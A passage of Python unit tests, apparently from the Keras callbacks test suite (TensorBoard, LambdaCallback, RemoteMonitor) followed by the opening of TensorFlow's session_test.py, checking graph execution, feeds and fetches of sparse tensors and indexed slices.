epochs=1) import re with open(filepath) as csvfile: output = " ".join(csvfile.readlines()) assert len(re.findall('epoch', output)) == 1 os.remove(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index class DummyStatefulMetric(Layer): def __init__(self, name='dummy_stateful_metric', **kwargs): super(DummyStatefulMetric, self).__init__(name=name, **kwargs) self.stateful = True self.state = K.variable(value=0, dtype='int32') def reset_states(self): pass def __call__(self, y_true, y_pred): return self.state inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy', DummyStatefulMetric()]) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq, embeddings_freq=1): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=embeddings_freq, embeddings_layer_names=['dense_1'], embeddings_data=X_test, batch_size=5)] # fit without validation data model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0), epochs=3) # fit with validation data and accuracy model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=0), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq, embeddings_freq=1): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=embeddings_freq, embeddings_layer_names=['dense_1'], embeddings_data=X_test, batch_size=5)] # fit without validation data should raise ValueError if histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=1), epochs=3) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator without validation data should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator with validation data generator should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=data_generator(False), validation_steps=1, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) @keras_test def test_TensorBoard_multi_input_output(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim, input_dim), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield ([X_train[i * batch_size: (i + 1) * batch_size]] * 2, [y_train[i * batch_size: (i + 1) * batch_size]] * 2) else: yield ([X_test[i * batch_size: (i + 1) * batch_size]] * 2, [y_test[i * batch_size: (i + 1) * batch_size]] * 2) i += 1 i = i % max_batch_index inp1 = Input((input_dim, input_dim)) inp2 = Input((input_dim, input_dim)) inp_3d = add([inp1, inp2]) inp_2d = GlobalAveragePooling1D()(inp_3d) # test a layer with a list of output tensors inp_pair = Lambda(lambda x: x)([inp_3d, inp_2d]) hidden = dot(inp_pair, axes=-1) hidden = Dense(num_hidden, activation='relu')(hidden) hidden = Dropout(0.1)(hidden) output1 = Dense(num_classes, activation='softmax')(hidden) output2 = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=[inp1, inp2], outputs=[output1, output2]) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq, embeddings_freq=1): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=embeddings_freq, embeddings_layer_names=['dense_1'], embeddings_data=[X_test] * 2, batch_size=5)] # fit without validation data model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0), epochs=3) # fit with validation data and accuracy model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard_convnet(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') input_shape = (16, 16, 3) (x_train, y_train), (x_test, y_test) = get_test_data(num_train=500, num_test=200, input_shape=input_shape, classification=True, num_classes=num_classes) y_train = np_utils.to_categorical(y_train) y_test = np_utils.to_categorical(y_test) model = Sequential([ Conv2D(filters=8, kernel_size=3, activation='relu', input_shape=input_shape), MaxPooling2D(pool_size=2), Conv2D(filters=4, kernel_size=(3, 3), activation='relu', padding='same'), GlobalAveragePooling2D(), Dense(num_classes, activation='softmax') ]) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1, write_images=True, write_grads=True, batch_size=16) cbks = [tsb] model.summary() history = model.fit(x_train, y_train, epochs=2, batch_size=16, validation_data=(x_test, y_test), callbacks=cbks, verbose=0) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_CallbackValData(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=[cbk], epochs=1) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit_generator(data_generator(True), len(X_train), epochs=1, validation_data=(X_test, y_test), callbacks=[cbk2]) # callback validation data should always have x, y, and sample weights assert len(cbk.validation_data) == len(cbk2.validation_data) == 3 assert cbk.validation_data[0] is cbk2.validation_data[0] assert cbk.validation_data[1] is cbk2.validation_data[1] assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape @keras_test def test_LambdaCallback(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # Start an arbitrary process that should run during model training and # be terminated after training has completed. def f(): while True: pass p = multiprocessing.Process(target=f) p.start() cleanup_callback = callbacks.LambdaCallback( on_train_end=lambda logs: p.terminate()) cbks = [cleanup_callback] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) p.join() assert not p.is_alive() @keras_test def test_TensorBoard_with_ReduceLROnPlateau(tmpdir): import shutil np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [ callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.5, patience=4, verbose=1), callbacks.TensorBoard( log_dir=filepath)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=2) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def tests_RemoteMonitor(): (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.RemoteMonitor()] with patch('requests.post'): model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) @keras_test def tests_RemoteMonitorWithJsonPayload(): (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.RemoteMonitor(send_as_json=True)] with patch('requests.post'): model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) if __name__ == '__main__': pytest.main([__file__])
session_test.py
# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for tensorflow.python.client.session.Session.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import threading import time import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.lib.core import error_codes_pb2 from tensorflow.core.protobuf import config_pb2 from tensorflow.python.client import session from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_util from tensorflow.python.framework import test_util from tensorflow.python.framework import versions from tensorflow.python.ops import array_ops from tensorflow.python.ops import constant_op from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import state_ops from tensorflow.python.ops import variables from tensorflow.python.platform import googletest from tensorflow.python.util import compat # NOTE(mrry): Dummy shape registration for op used in the tests. ops.RegisterShape('ConstructionFails')(None) class SessionTest(test_util.TensorFlowTestCase): def testUseExistingGraph(self): with ops.Graph().as_default() as g, ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(graph=g): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testUseDefaultGraph(self): with ops.Graph().as_default(), ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testCreate(self): with session.Session(): inp = constant_op.constant(10.0, shape=[2, 3], name='W1') copy = array_ops.identity(inp) # Test with feed. # TODO(mrry): Investigate why order='F' didn't work. arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C') copy_val = copy.eval({'W1:0': arr}) self.assertAllEqual(arr, copy_val) # Test without feed. copy_val = copy.eval() self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32), copy_val) def testManyCPUs(self): # TODO(keveman): Implement ListDevices and test for the number of # devices returned by ListDevices. with session.Session( config=config_pb2.ConfigProto(device_count={'CPU': 2})): inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) def testPerSessionThreads(self): # TODO(keveman): Implement ListDevices and test for the number of # devices returned by ListDevices. with session.Session( config=config_pb2.ConfigProto(use_per_session_threads=True)): inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) def testErrorsReported(self): with session.Session() as s: constant_op.constant(10.0, name='W1') with self.assertRaises(ValueError): s.run('foo:0') def testErrorPayload(self): with session.Session(): a = array_ops.placeholder(dtypes.float32) with self.assertRaisesOpError(lambda e: e.op == a.op): a.eval() def testErrorCodeWithNoNodeDef(self): with session.Session() as s: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) def exc_predicate(e): return (e.op is None and e.node_def is None and e.error_code == error_codes_pb2.INVALID_ARGUMENT) with self.assertRaisesOpError(exc_predicate): # Run with a bogus handle. s.partial_run('foo', r1, feed_dict={a: 1, b: 2}) def testOpConstructionErrorPayload(self): with session.Session(): failing_op = ops.get_default_graph().create_op( 'ConstructionFails', [], [], name='f') def exc_predicate(e): return (e.op == failing_op and e.error_code == error_codes_pb2.INVALID_ARGUMENT) with self.assertRaisesOpError(exc_predicate): failing_op.run() def testErrorBasedOn(self): with session.Session() as sess: a = constant_op.constant(0.0, shape=[2, 3]) # NOTE(mrry): The original_op is nonsense, but used here to test that the # errors are reported correctly. # pylint: disable=protected-access with sess.graph._original_op(a.op): b = array_ops.identity(a, name='id') with sess.graph._original_op(b.op): c = array_ops.placeholder(dtypes.float32) # pylint: enable=protected-access def exc_predicate(e): return (e.op == c.op and e.op._original_op == b.op and e.op._original_op._original_op == a.op) with self.assertRaisesOpError(exc_predicate): c.eval() def testFetchTensorObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) results_with_list = s.run([c]) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0]) results_with_single = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single) results_with_get = c.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get) a_val, b_val = s.run([a, b]) # Test multiple fetches. self.assertAllEqual([[1.0, 1.0]], a_val) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val) def testFetchScalar(self): with session.Session() as s: for scalar in np.int32, np.int64, np.float16, np.float32, np.float64: x = scalar(7) y = scalar(8) tf_x = constant_op.constant(x, shape=[]) tf_y = constant_op.constant(y) tf_xy = math_ops.add(tf_x, tf_y) # Single fetch xy = s.run(tf_xy) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # List fetch xy, = s.run([tf_xy]) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) def testFetchOperationObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) v = variables.Variable(a, name='testFetchOperationObject_v') s.run(v.initializer) v_val = s.run(v) self.assertAllEqual([[1.0, 1.0]], v_val) def testFetchSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = ops.SparseTensor( constant_op.constant(indices), constant_op.constant(values), constant_op.constant(shape)) # Single fetch, use as tuple sp_out = s.run(sp) indices_out, values_out, shape_out = sp_out self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Single fetch, use as SparseTensorValue sp_out = s.run(sp) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.shape, shape) # Tuple fetch, use as tuple indices_out, values_out, shape_out = s.run(sp) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as tuple (indices_out, values_out, shape_out), = s.run([sp]) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as SparseTensorValue sp_out, = s.run([sp]) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.shape, shape) def testFeedSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = ops.SparseTensor( array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(3,)),) sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.shape) sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)}) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], {sp: ops.SparseTensorValue(indices, values, shape)}) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)}) self.assertAllEqual(sp2_out.indices, indices) self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.shape, shape) def testFetchIndexedSlices(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = np.array([7, 9, 2]).astype(np.int64) ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), constant_op.constant(dense_shape)) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlices(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = np.array([7, 9, 2]).astype(np.int64) ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.int64, shape=(3,)),) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind_dense_shape = array_ops.identity(ind.dense_shape) ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape) # Feed with tuple values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], {ind: (values, indices, dense_shape)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Feed with IndexedSlicesValue values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testFetchIndexedSlicesWithoutDenseShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = None ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), None) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlicesWithoutDenseShape(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = None ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind2 = ops.IndexedSlices(ind_values, ind_indices) # Feed with tuple values_out, indices_out = s.run( [ind_values, ind_indices], {ind: (values, indices)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue values_out, indices_out = s.run( [ind_values, ind_indices], {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices, dense_shape)}) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testExtendWithStatelessOperations(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) c_val = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], c_val) d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1]) e = math_ops.matmul(c, d) # Extend will happen here. e_val = s.run(e) self.assertAllEqual([[24.0]], e_val) def testExtendWithStatefulOperations(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) v = variables.Variable(c, name='testExtendWithStatefulOperations_v') v.initializer.run() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) # Extend will happen here. e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) def testExtendWithGroupBy(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) p = variables.Variable(a, name='testExtendWithGroupBy_p') a_val = a.eval() # Force an Extend after this op. self.assertAllEqual([[1.0, 1.0]], a_val) b = constant_op.constant(2.0, shape=[1, 2]) q = variables.Variable(b, name='testExtendWithGroupBy_q') # Extend will happen here. init = control_flow_ops.group(p.initializer, q.initializer) s.run(init) p_val, q_val = s.run([p, q]) self.assertAllEqual([[1.0, 1.0]], p_val) self.assertAllEqual([[2.0, 2.0]], q_val) def testTensorGetMethod(self): with session.Session(): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) c_val = c.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], c_val) fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]}) self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val) def testOperationRunMethod(self): with session.Session(): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[1, 2], name='b') v = variables.Variable(a, a.dtype) assign_a_to_v = state_ops.assign(v, a) assign_a_to_v.eval() v_val = v.eval() self.assertAllEqual([[1.0, 1.0]], v_val) assign_b_to_v = state_ops.assign(v, b) assign_b_to_v.eval() v_val = v.eval() self.assertAllEqual([[2.0, 2.0]], v_val) assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]}) v_val = v.eval() self.assertAllEqual([[3.0, 3.0]], v_val) def testDefaultGraph(self): with session.Session() as s: self.assertEqual(ops.get_default_graph(), s.graph) a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) self.assertEqual(ops.get_default_graph(), a.graph) self.assertEqual(ops.get_default_graph(), b.graph) c = math_ops.matmul(a, b) v = variables.Variable(c, name='testDefaultGraph_v') v.initializer.run() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) self.assertEqual(ops.get_default_graph(), s.graph) def _testDefaultGraphInThread(self, constructed_event, continue_event, i): with session.Session() as s: self.assertEqual(ops.get_default_graph(), s.graph) a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) v = variables.Variable(c, name='var_%d' % i) # Block here until all threads have constructed their graph. constructed_event.set() continue_event.wait() assign_c_to_v = state_ops.assign(v, c) v.initializer.run() assign_c_to_v.eval() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) e_val = e.eval() self.assertAllEqual([[6.0, 